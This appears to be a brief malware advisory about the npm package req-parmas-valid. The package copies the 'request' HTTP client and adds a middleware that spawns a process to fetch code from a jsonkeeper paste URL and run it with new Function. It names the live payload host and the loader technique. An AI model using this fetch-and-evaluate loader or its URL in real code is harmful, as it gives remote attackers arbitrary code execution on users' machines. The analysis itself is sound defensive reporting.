Package name req-parmas-valid impersonates the well-known request HTTP client (description copied verbatim as 'Simplified HTTP request client.', bugs.url points at github.com/request/request/issues, README and most source copied from upstream). Bolted onto the copied source is a malicious middleware export (also exposed as reqValidator and the package's default export) which spawns a detached node lib/callers.js child process. lib/callers.js performs an HTTPS GET to https://www.jsonkeeper.com/b/DDC6J (an anonymous, mutable paste host), reads the Cookie field of the JSON response, and evaluates it via new Function.constructor("require", s)(require) — handing the fetched bytes full Node require capability with no integrity check, no pinning, and a payload host completely alien to the package's advertised purpose. Any consumer that imports and uses the middleware (the obvious Express-style API shape) executes arbitrary remote code controlled by whoever currently owns the paste.